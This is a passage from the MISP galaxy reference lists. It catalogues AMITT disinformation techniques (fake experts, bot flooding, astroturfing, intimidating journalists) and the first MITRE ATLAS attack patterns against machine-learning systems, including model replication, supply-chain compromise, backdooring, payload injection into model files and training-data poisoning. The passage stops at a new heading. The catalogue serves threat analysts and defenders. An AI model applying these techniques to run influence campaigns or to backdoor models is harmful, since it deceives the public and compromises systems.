https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0032.md

Instagram

Use Instagram as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="Instagram"

Table 5189. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0033.md

LinkedIn

Use LinkedIn as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="LinkedIn"

Table 5190. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0034.md

Pinterest

Use Pinterest as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="Pinterest"

Table 5191. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0035.md

WhatsApp

Use WhatsApp as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="WhatsApp"

Table 5192. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0036.md

Facebook

Use Facebook as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="Facebook"

Table 5193. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0037.md

Twitter

Use Twitter as a narrative dissemination channel

The tag is: misp-galaxy:amitt-misinformation-pattern="Twitter"

Table 5194. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0038.md

Bait legitimate influencers

The tag is: misp-galaxy:amitt-misinformation-pattern="Bait legitimate influencers"

Table 5195. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0039.md

Demand unsurmountable proof

The tag is: misp-galaxy:amitt-misinformation-pattern="Demand unsurmountable proof"

Table 5196. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0040.md

Deny involvement

The tag is: misp-galaxy:amitt-misinformation-pattern="Deny involvement"

Table 5197. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0041.md

Kernel of Truth

The tag is: misp-galaxy:amitt-misinformation-pattern="Kernel of Truth"

Table 5198. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0042.md

Use SMS/ WhatsApp/ Chat apps

The tag is: misp-galaxy:amitt-misinformation-pattern="Use SMS/ WhatsApp/ Chat apps"

Table 5199. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0043.md

Seed distortions

The tag is: misp-galaxy:amitt-misinformation-pattern="Seed distortions"

Table 5200. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0044.md

Use fake experts

Use the fake experts that were set up in T0009. Pseudo-experts are disposable assets that often appear once and then disappear. Give "credility" to misinformation. Take advantage of credential bias

The tag is: misp-galaxy:amitt-misinformation-pattern="Use fake experts"

Table 5201. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0045.md

Search Engine Optimization

Manipulate content engagement metrics (ie: Reddit & Twitter) to influence/impact news search results (e.g. Google), also elevates RT & Sputnik headline into Google news alert emails. aka "Black-hat SEO"

The tag is: misp-galaxy:amitt-misinformation-pattern="Search Engine Optimization"

Table 5202. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0046.md

Muzzle social media as a political force

Use political influence or the power of state to stop critical social media comments. Government requested/driven content take downs (see Google Transperancy reports. (Example 20190 Singapore Protection from Online Falsehoods and Manipulation Bill would make it illegal to spread "false statements of fact" in Singapore, where that information is "prejudicial" to Singapore’s security or "public tranquility." Or India/New Delhi has cut off services to Facebook and Twitter in Kashmir 28 times in the past five years, and in 2016, access was blocked for five months — on the grounds that these platforms were being used for anti-social and "anti-national" purposes.

The tag is: misp-galaxy:amitt-misinformation-pattern="Muzzle social media as a political force"

Table 5203. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0047.md

Cow online opinion leaders

Intimidate, coerce, threaten critics/dissidents/journalists via trolling, doxing. Phillipines (example) Maria Ressa and Rappler journalists targeted Duterte regime, lawsuits, trollings, banned from the presidential palace where press briefings take place. 2017 Bot attack on five ProPublica Journalists.

The tag is: misp-galaxy:amitt-misinformation-pattern="Cow online opinion leaders"

Table 5204. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0048.md

Flooding

Flooding and/or mobbing social media channels feeds and/or hashtag with excessive volume of content to control/shape online conversations and/or drown out opposing points of view. Bots and/or patriotic trolls are effective tools to acheive this effect.

Example (2018): bots flood social media promoting messages which support Saudi Arabia with intent to cast doubt on allegations that the kingdom was involved in Khashoggi’s death.

The tag is: misp-galaxy:amitt-misinformation-pattern="Flooding"

Table 5205. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0049.md

Cheerleading domestic social media ops

Deploy state-coordinated social media commenters and astroturfers. Both internal/domestic and external social media influence operations, popularized by China (50cent Army manage message inside the "Great Firewall") but also technique used by Chinese English-language social media influence operations are seeded by state-run media, which overwhelmingly present a positive, benign, and cooperative image of China.

The tag is: misp-galaxy:amitt-misinformation-pattern="Cheerleading domestic social media ops"

Table 5206. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0050.md

Fabricate social media comment

Use government-paid social media commenters, astroturfers, chat bots (programmed to reply to specific key words/hashtags) influence online conversations, product reviews, web-site comment forums. (2017 example) the FCC was inundated with nearly 22 million public comments on net neutrality (many from fake accounts)

The tag is: misp-galaxy:amitt-misinformation-pattern="Fabricate social media comment"

Table 5207. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0051.md

Tertiary sites amplify news

Create content/news/opinion web-sites to cross-post stories. Tertiary sites circulate and amplify narratives. Often these sites have no masthead, bylines or attribution.

Examples of tertiary sites inculde Russia Insider, The Duran, geopolitica.ru, Mint Press News, Oriental Review, globalresearch.ca.

Example (2019, Domestic news): Snopes reveals Star News Digital Media, Inc. may look like a media company that produces local news, but operates via undisclosed connections to political activism.

Example (2018) FireEye reports on Iranian campaign that created between April 2018 and March 2019 sites used to spread inauthentic content from websites such as Liberty Front Press (LFP), US Journal, and Real Progressive Front during the US mid-terms.

The tag is: misp-galaxy:amitt-misinformation-pattern="Tertiary sites amplify news"

Table 5208. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0052.md

Twitter trolls amplify and manipulate

Use trolls to amplify narratives and/or manipulate narratives. Fake profiles/sockpuppets operating to support individuals/narratives from the entire political spectrum (left/right binary). Operating with increased emphasis on promoting local content and promoting real Twitter users generating their own, often divisive political content, as it’s easier to amplify existing content than create new/original content. Trolls operate where ever there’s a socially divisive issue (issues that can/are be politicized) e.g. BlackLivesMatter or MeToo

The tag is: misp-galaxy:amitt-misinformation-pattern="Twitter trolls amplify and manipulate"

Table 5209. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0053.md

Twitter bots amplify

Use bots to amplify narratives above algorithm thresholds. Bots are automated/programmed profiles designed to amplify content (ie: automatically retweet or like) and give appearance it’s more "popular" than it is. They can operate as a network, to function in a coordinated/orchestrated manner. In some cases (more so now) they are an inexpensive/disposable assets used for minimal deployment as bot detection tools improve and platforms are more responsive.(example 2019) #TrudeauMustGo

The tag is: misp-galaxy:amitt-misinformation-pattern="Twitter bots amplify"

Table 5210. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0054.md

Use hashtag

Use the dedicated hashtag for the incident (e.g. #PhosphorusDisaster)

The tag is: misp-galaxy:amitt-misinformation-pattern="Use hashtag"

Table 5211. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0055.md

Dedicated channels disseminate information pollution

Output information pollution (e.g. articles on an unreported false story/event) through channels controlled by or related to the incident creator. Examples include RT/Sputnik or antivax websites seeding stories.

The tag is: misp-galaxy:amitt-misinformation-pattern="Dedicated channels disseminate information pollution"

Table 5212. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0056.md

Organise remote rallies and events

Coordinate and promote real-world events across media platforms, e.g. rallies, protests, gatherings in support of incident narratives. Example: Facebook groups/pages coordinate/more divisive/polarizing groups and actvities into the public space. (Example) Mueller’s report, highlights, the IRA organized political rallies in the U.S. using social media starting in 2015 and continued to coordinate rallies after the 2016 election

The tag is: misp-galaxy:amitt-misinformation-pattern="Organise remote rallies and events"

Table 5213. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0057.md

Legacy web content

Make incident content visible for a long time, e.g. by exploiting platform terms of service, or placing it where it’s hard to remove or unlikely to be removed.

The tag is: misp-galaxy:amitt-misinformation-pattern="Legacy web content"

Table 5214. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0058.md

Play the long game

The tag is: misp-galaxy:amitt-misinformation-pattern="Play the long game"

Table 5215. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0059.md

Continue to amplify

The tag is: misp-galaxy:amitt-misinformation-pattern="Continue to amplify"

Table 5216. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0060.md

Sell merchandising

Sell hats, t-shirts, flags and other branded content that’s designed to be seen in the real world

The tag is: misp-galaxy:amitt-misinformation-pattern="Sell merchandising"

Table 5217. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0061.md

MITRE ATLAS Attack Pattern

MITRE ATLAS Attack Pattern - Adversarial Threat Landscape for Artificial-Intelligence Systems.

MITRE ATLAS Attack Pattern is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Search for Victim’s Publicly Available Research Materials

Adversaries may search publicly available research to learn how and where machine learning is used within a victim organization. The adversary can use this information to identify targets for attack, or to tailor an existing attack to make it more effective. Organizations often use open source model architectures trained on additional proprietary data in production. Knowledge of this underlying architecture allows the adversary to craft more realistic proxy models ([Create Proxy ML Model](https://atlas.mitre.org/techniques/AML.T0005)). An adversary can search these resources for publications for authors employed at the victim organization.

Research materials may exist as academic papers published in [Journals and Conference Proceedings](https://atlas.mitre.org/techniques/AML.T0000.000), or stored in [Pre-Print Repositories](https://atlas.mitre.org/techniques/AML.T0000.001), as well as [Technical Blogs](https://atlas.mitre.org/techniques/AML.T0000.002).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Search for Victim’s Publicly Available Research Materials"

Table 5218. Table References

Links

https://atlas.mitre.org/techniques/AML.T0000

Journals and Conference Proceedings

Many of the publications accepted at premier machine learning conferences and journals come from commercial labs. Some journals and conferences are open access, others may require paying for access or a membership. These publications will often describe in detail all aspects of a particular approach for reproducibility. This information can be used by adversaries to implement the paper.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Journals and Conference Proceedings"

Table 5219. Table References

Links

https://atlas.mitre.org/techniques/AML.T0000.000

Pre-Print Repositories

Pre-Print repositories, such as arXiv, contain the latest academic research papers that haven’t been peer reviewed. They may contain research notes, or technical reports that aren’t typically published in journals or conference proceedings. Pre-print repositories also serve as a central location to share papers that have been accepted to journals. Searching pre-print repositories provide adversaries with a relatively up-to-date view of what researchers in the victim organization are working on.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Pre-Print Repositories"

Table 5220. Table References

Links

https://atlas.mitre.org/techniques/AML.T0000.001

Technical Blogs

Research labs at academic institutions and Company R&D divisions often have blogs that highlight their use of machine learning and its application to the organizations unique problems. Individual researchers also frequently document their work in blogposts. An adversary may search for posts made by the target victim organization or its employees. In comparison to [Journals and Conference Proceedings](https://atlas.mitre.org/techniques/AML.T0000.000) and [Pre-Print Repositories](https://atlas.mitre.org/techniques/AML.T0000.001) this material will often contain more practical aspects of the machine learning system. This could include underlying technologies and frameworks used, and possibly some information about the API access and use case. This will help the adversary better understand how that organization is using machine learning internally and the details of their approach that could aid in tailoring an attack.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Technical Blogs"

Table 5221. Table References

Links

https://atlas.mitre.org/techniques/AML.T0000.002

Search for Publicly Available Adversarial Vulnerability Analysis

Much like the [Search for Victim’s Publicly Available Research Materials](https://atlas.mitre.org/techniques/AML.T0000), there is often ample research available on the vulnerabilities of common models. Once a target has been identified, an adversary will likely try to identify any pre-existing work that has been done for this class of models. This will include not only reading academic papers that may identify the particulars of a successful attack, but also identifying pre-existing implementations of those attacks. The adversary may [Adversarial ML Attack Implementations](https://atlas.mitre.org/techniques/AML.T0016.000) or [Adversarial ML Attacks](https://atlas.mitre.org/techniques/AML.T0017.000) their own if necessary.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Search for Publicly Available Adversarial Vulnerability Analysis"

Table 5222. Table References

Links

https://atlas.mitre.org/techniques/AML.T0001

Acquire Public ML Artifacts

Adversaries may search public sources, including cloud storage, public-facing services, and software or data repositories, to identify machine learning artifacts. These machine learning artifacts may include the software stack used to train and deploy models, training and testing data, model configurations and parameters. An adversary will be particularly interested in artifacts hosted by or associated with the victim organization as they may represent what that organization uses in a production environment. Adversaries may identify artifact repositories via other resources associated with the victim organization (e.g. [Search Victim-Owned Websites](https://atlas.mitre.org/techniques/AML.T0003) or [Search for Victim’s Publicly Available Research Materials](https://atlas.mitre.org/techniques/AML.T0000)). These ML artifacts often provide adversaries with details of the ML task and approach.

ML artifacts can aid in an adversary’s ability to [Create Proxy ML Model](https://atlas.mitre.org/techniques/AML.T0005). If these artifacts include pieces of the actual model in production, they can be used to directly [Craft Adversarial Data](https://atlas.mitre.org/techniques/AML.T0043). Acquiring some artifacts requires registration (providing user details such email/name), AWS keys, or written requests, and may require the adversary to [Establish Accounts](https://atlas.mitre.org/techniques/AML.T0021).

Artifacts might be hosted on victim-controlled infrastructure, providing the victim with some information on who has accessed that data.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Acquire Public ML Artifacts"

Table 5223. Table References

Links

https://atlas.mitre.org/techniques/AML.T0002

Datasets

Adversaries may collect public datasets to use in their operations. Datasets used by the victim organization or datasets that are representative of the data used by the victim organization may be valuable to adversaries. Datasets can be stored in cloud storage, or on victim-owned websites. Some datasets require the adversary to [Establish Accounts](https://atlas.mitre.org/techniques/AML.T0021) for access.

Acquired datasets help the adversary advance their operations, stage attacks, and tailor attacks to the victim organization.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Datasets"

Table 5224. Table References

Links

https://atlas.mitre.org/techniques/AML.T0002.000

Models

Adversaries may acquire public models to use in their operations. Adversaries may seek models used by the victim organization or models that are representative of those used by the victim organization. Representative models may include model architectures, or pre-trained models which define the architecture as well as model parameters from training on a dataset. The adversary may search public sources for common model architecture configuration file formats such as YAML or Python configuration files, and common model storage file formats such as ONNX (.onnx), HDF5 (.h5), Pickle (.pkl), PyTorch (.pth), or TensorFlow (.pb, .tflite).

Acquired models are useful in advancing the adversary’s operations and are frequently used to tailor attacks to the victim model.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Models"

Table 5225. Table References

Links

https://atlas.mitre.org/techniques/AML.T0002.001

Search Victim-Owned Websites

Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain technical details about their ML-enabled products or services. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info. These sites may also have details highlighting business operations and relationships.

Adversaries may search victim-owned websites to gather actionable information. This information may help adversaries tailor their attacks (e.g. [Adversarial ML Attacks](https://atlas.mitre.org/techniques/AML.T0017.000) or [Manual Modification](https://atlas.mitre.org/techniques/AML.T0043.003)). Information from these sources may reveal opportunities for other forms of reconnaissance (e.g. [Search for Victim’s Publicly Available Research Materials](https://atlas.mitre.org/techniques/AML.T0000) or [Search for Publicly Available Adversarial Vulnerability Analysis](https://atlas.mitre.org/techniques/AML.T0001))

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Search Victim-Owned Websites"

Table 5226. Table References

Links

https://atlas.mitre.org/techniques/AML.T0003

Search Application Repositories

Adversaries may search open application repositories during targeting. Examples of these include Google Play, the iOS App store, the macOS App Store, and the Microsoft Store.

Adversaries may craft search queries seeking applications that contain a ML-enabled components. Frequently, the next step is to [Acquire Public ML Artifacts](https://atlas.mitre.org/techniques/AML.T0002).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Search Application Repositories"

Table 5227. Table References

Links

https://atlas.mitre.org/techniques/AML.T0004

Create Proxy ML Model

Adversaries may obtain models to serve as proxies for the target model in use at the victim organization. Proxy models are used to simulate complete access to the target model in a fully offline manner.

Adversaries may train models from representative datasets, attempt to replicate models from victim inference APIs, or use available pre-trained models.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Create Proxy ML Model"

Table 5228. Table References

Links

https://atlas.mitre.org/techniques/AML.T0005

Train Proxy via Gathered ML Artifacts

Proxy models may be trained from ML artifacts (such as data, model architectures, and pre-trained models) that are representative of the target model gathered by the adversary. This can be used to develop attacks that require higher levels of access than the adversary has available or as a means to validate pre-existing attacks without interacting with the target model.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Train Proxy via Gathered ML Artifacts"

Table 5229. Table References

Links

https://atlas.mitre.org/techniques/AML.T0005.000

Train Proxy via Replication

Adversaries may replicate a private model. By repeatedly querying the victim’s [ML Model Inference API Access](https://atlas.mitre.org/techniques/AML.T0040), the adversary can collect the target model’s inferences into a dataset. The inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model.

A replicated model that closely mimic’s the target model is a valuable resource in staging the attack. The adversary can use the replicated model to [Craft Adversarial Data](https://atlas.mitre.org/techniques/AML.T0043) for various purposes (e.g. [Evade ML Model](https://atlas.mitre.org/techniques/AML.T0015), [Spamming ML System with Chaff Data](https://atlas.mitre.org/techniques/AML.T0046)).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Train Proxy via Replication"

Table 5230. Table References

Links

https://atlas.mitre.org/techniques/AML.T0005.001

Use Pre-Trained Model

Adversaries may use an off-the-shelf pre-trained model as a proxy for the victim model to aid in staging the attack.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Use Pre-Trained Model"

Table 5231. Table References

Links

https://atlas.mitre.org/techniques/AML.T0005.002

Active Scanning

An adversary may probe or scan the victim system to gather information for targeting. This is distinct from other reconnaissance techniques that do not involve direct interaction with the victim system.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Active Scanning"

Table 5232. Table References

Links

https://atlas.mitre.org/techniques/AML.T0006

Discover ML Artifacts

Adversaries may search private sources to identify machine learning artifacts that exist on the system and gather information about them. These artifacts can include the software stack used to train and deploy models, training and testing data management systems, container registries, software repositories, and model zoos.

This information can be used to identify targets for further collection, exfiltration, or disruption, and to tailor and improve attacks.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Discover ML Artifacts"

Table 5233. Table References

Links

https://atlas.mitre.org/techniques/AML.T0007

Acquire Infrastructure

Adversaries may buy, lease, or rent infrastructure for use throughout their operation. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, mobile devices, and third-party web services. Free resources may also be used, but they are typically limited.

Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Acquire Infrastructure"

Table 5234. Table References

Links

https://atlas.mitre.org/techniques/AML.T0008

ML Development Workspaces

Developing and staging machine learning attacks often requires expensive compute resources. Adversaries may need access to one or many GPUs in order to develop an attack. They may try to anonymously use free resources such as Google Colaboratory, or cloud resources such as AWS, Azure, or Google Cloud as an efficient way to stand up temporary resources to conduct operations. Multiple workspaces may be used to avoid detection.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="ML Development Workspaces"

Table 5235. Table References

Links

https://atlas.mitre.org/techniques/AML.T0008.000

Consumer Hardware

Adversaries may acquire consumer hardware to conduct their attacks. Owning the hardware provides the adversary with complete control of the environment. These devices can be hard to trace.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Consumer Hardware"

Table 5236. Table References

Links

https://atlas.mitre.org/techniques/AML.T0008.001

ML Supply Chain Compromise

Adversaries may gain initial access to a system by compromising the unique portions of the ML supply chain. This could include [GPU Hardware](https://atlas.mitre.org/techniques/AML.T0010.000), [Data](https://atlas.mitre.org/techniques/AML.T0010.002) and its annotations, parts of the ML [ML Software](https://atlas.mitre.org/techniques/AML.T0010.001) stack, or the [Model](https://atlas.mitre.org/techniques/AML.T0010.003) itself. In some instances the attacker will need secondary access to fully carry out an attack using compromised components of the supply chain.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="ML Supply Chain Compromise"

Table 5237. Table References

Links

https://atlas.mitre.org/techniques/AML.T0010

GPU Hardware

Most machine learning systems require access to certain specialized hardware, typically GPUs. Adversaries can target machine learning systems by specifically targeting the GPU supply chain.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="GPU Hardware"

Table 5238. Table References

Links

https://atlas.mitre.org/techniques/AML.T0010.000

ML Software

Most machine learning systems rely on a limited set of machine learning frameworks. An adversary could get access to a large number of machine learning systems through a comprise of one of their supply chains. Many machine learning projects also rely on other open source implementations of various algorithms. These can also be compromised in a targeted way to get access to specific systems.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="ML Software"

Table 5239. Table References

Links

https://atlas.mitre.org/techniques/AML.T0010.001

Data

Data is a key vector of supply chain compromise for adversaries. Every machine learning project will require some form of data. Many rely on large open source datasets that are publicly available. An adversary could rely on compromising these sources of data. The malicious data could be a result of [Poison Training Data](https://atlas.mitre.org/techniques/AML.T0020) or include traditional malware.

An adversary can also target private datasets in the labeling phase. The creation of private datasets will often require the hiring of outside labeling services. An adversary can poison a dataset by modifying the labels being generated by the labeling service.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Data"

Table 5240. Table References

Links

https://atlas.mitre.org/techniques/AML.T0010.002

Model

Machine learning systems often rely on open sourced models in various ways. Most commonly, the victim organization may be using these models for fine tuning. These models will be downloaded from an external source and then used as the base for the model as it is tuned on a smaller, private dataset. Loading models often requires executing some saved code in the form of a saved model file. These can be compromised with traditional malware, or through some adversarial machine learning techniques.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Model"

Table 5241. Table References

Links

https://atlas.mitre.org/techniques/AML.T0010.003

User Execution

An adversary may rely upon specific actions by a user in order to gain execution. Users may inadvertently execute unsafe code introduced via [ML Supply Chain Compromise](https://atlas.mitre.org/techniques/AML.T0010). Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="User Execution"

Table 5242. Table References

Links

https://atlas.mitre.org/techniques/AML.T0011

Unsafe ML Artifacts

Adversaries may develop unsafe ML artifacts that when executed have a deleterious effect. The adversary can use this technique to establish persistent access to systems. These models may be introduced via a [ML Supply Chain Compromise](https://atlas.mitre.org/techniques/AML.T0010).

Serialization of models is a popular technique for model storage, transfer, and loading. However, this format without proper checking presents an opportunity for code execution.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Unsafe ML Artifacts"

Table 5243. Table References

Links

https://atlas.mitre.org/techniques/AML.T0011.000

Valid Accounts

Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access. Credentials may take the form of usernames and passwords of individual user accounts or API keys that provide access to various ML resources and services.

Compromised credentials may provide access to additional ML artifacts and allow the adversary to perform [Discover ML Artifacts](https://atlas.mitre.org/techniques/AML.T0007). Compromised credentials may also grant and adversary increased privileges such as write access to ML artifacts used during development or production.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Valid Accounts"

Table 5244. Table References

Links

https://atlas.mitre.org/techniques/AML.T0012

Discover ML Model Ontology

Adversaries may discover the ontology of a machine learning model’s output space, for example, the types of objects a model can detect. The adversary may discovery the ontology by repeated queries to the model, forcing it to enumerate its output space. Or the ontology may be discovered in a configuration file or in documentation about the model.

The model ontology helps the adversary understand how the model is being used by the victim. It is useful to the adversary in creating targeted attacks.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Discover ML Model Ontology"

Table 5245. Table References

Links

https://atlas.mitre.org/techniques/AML.T0013

Discover ML Model Family

Adversaries may discover the general family of model. General information about the model may be revealed in documentation, or the adversary may used carefully constructed examples and analyze the model’s responses to categorize it.

Knowledge of the model family can help the adversary identify means of attacking the model and help tailor the attack.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Discover ML Model Family"

Table 5246. Table References

Links

https://atlas.mitre.org/techniques/AML.T0014

Evade ML Model

Adversaries can [Craft Adversarial Data](https://atlas.mitre.org/techniques/AML.T0043) that prevent a machine learning model from correctly identifying the contents of the data. This technique can be used to evade a downstream task where machine learning is utilized. The adversary may evade machine learning based virus/malware detection, or network scanning towards the goal of a traditional cyber attack.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Evade ML Model"

Table 5247. Table References

Links

https://atlas.mitre.org/techniques/AML.T0015

Obtain Capabilities

Adversaries may search for and obtain software capabilities for use in their operations. Capabilities may be specific to ML-based attacks [Adversarial ML Attack Implementations](https://atlas.mitre.org/techniques/AML.T0016.000) or generic software tools repurposed for malicious intent ([Software Tools](https://atlas.mitre.org/techniques/AML.T0016.001)). In both instances, an adversary may modify or customize the capability to aid in targeting a particular ML system.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Obtain Capabilities"

Table 5248. Table References

Links

https://atlas.mitre.org/techniques/AML.T0016

Adversarial ML Attack Implementations

Adversaries may search for existing open source implementations of machine learning attacks. The research community often publishes their code for reproducibility and to further future research. Libraries intended for research purposes, such as CleverHans, the Adversarial Robustness Toolbox, and FoolBox, can be weaponized by an adversary. Adversaries may also obtain and use tools that were not originally designed for adversarial ML attacks as part of their attack.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Adversarial ML Attack Implementations"

Table 5249. Table References

Links

https://atlas.mitre.org/techniques/AML.T0016.000

Software Tools

Adversaries may search for and obtain software tools to support their operations. Software designed for legitimate use may be repurposed by an adversary for malicious intent. An adversary may modify or customize software tools to achieve their purpose. Software tools used to support attacks on ML systems are not necessarily ML-based themselves.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Software Tools"

Table 5250. Table References

Links

https://atlas.mitre.org/techniques/AML.T0016.001

Develop Capabilities

Adversaries may develop their own capabilities to support operations. This process encompasses identifying requirements, building solutions, and deploying capabilities. Capabilities used to support attacks on ML systems are not necessarily ML-based themselves. Examples include setting up websites with adversarial information or creating Jupyter notebooks with obfuscated exfiltration code.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Develop Capabilities"

Table 5251. Table References

Links

https://atlas.mitre.org/techniques/AML.T0017

Adversarial ML Attacks

Adversaries may develop their own adversarial attacks. They may leverage existing libraries as a starting point ([Adversarial ML Attack Implementations](https://atlas.mitre.org/techniques/AML.T0016.000)). They may implement ideas described in public research papers or develop custom made attacks for the victim model.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Adversarial ML Attacks"

Table 5252. Table References

Links

https://atlas.mitre.org/techniques/AML.T0017.000

Backdoor ML Model

Adversaries may introduce a backdoor into a ML model. A backdoored model operates performs as expected under typical conditions, but will produce the adversary’s desired output when a trigger is introduced to the input data. A backdoored model provides the adversary with a persistent artifact on the victim system. The embedded vulnerability is typically activated at a later time by data samples with an [Insert Backdoor Trigger](https://atlas.mitre.org/techniques/AML.T0043.004)

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Backdoor ML Model"

Table 5253. Table References

Links

https://atlas.mitre.org/techniques/AML.T0018

Poison ML Model

Adversaries may introduce a backdoor by training the model poisoned data, or by interfering with its training process. The model learns to associate a adversary defined trigger with the adversary’s desired output.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Poison ML Model"

Table 5254. Table References

Links

https://atlas.mitre.org/techniques/AML.T0018.000

Inject Payload

Adversaries may introduce a backdoor into a model by injecting a payload into the model file. The payload detects the presence of the trigger and bypasses the model, instead producing the adversary’s desired output.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Inject Payload"

Table 5255. Table References

Links

https://atlas.mitre.org/techniques/AML.T0018.001

Publish Poisoned Datasets

Adversaries may [Poison Training Data](https://atlas.mitre.org/techniques/AML.T0020) and publish it to a public location. The poisoned dataset may be a novel dataset or a poisoned variant of an existing open source dataset. This data may be introduced to a victim system via [ML Supply Chain Compromise](https://atlas.mitre.org/techniques/AML.T0010).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Publish Poisoned Datasets"

Table 5256. Table References

Links

https://atlas.mitre.org/techniques/AML.T0019

Poison Training Data

Adversaries may attempt to poison datasets used by a ML model by modifying the underlying data or its labels. This allows the adversary to embed vulnerabilities in ML models trained on the data that may not be easily detectable. Data poisoning attacks may or may not require modifying the labels. The embedded vulnerability is activated at a later time by data samples with an [Insert Backdoor Trigger](https://atlas.mitre.org/techniques/AML.T0043.004)

Poisoned data can be introduced via [ML Supply Chain Compromise](https://atlas.mitre.org/techniques/AML.T0010) or the data may be poisoned after the adversary gains [Initial Access](https://atlas.mitre.org/tactics/AML.TA0004) to the system.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Poison Training Data"

Table 5257. Table References

Links

https://atlas.mitre.org/techniques/AML.T0020

Establish Accounts

Adversaries may create accounts with various services for use in targeting, to gain access to resources needed in [ML Attack Staging](https://atlas.mitre.org/tactics/AML.TA0001), or for victim impersonation.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Establish Accounts"

Table 5258. Table References

Links

https://atlas.mitre.org/techniques/AML.T0021

Exfiltration via ML Inference API

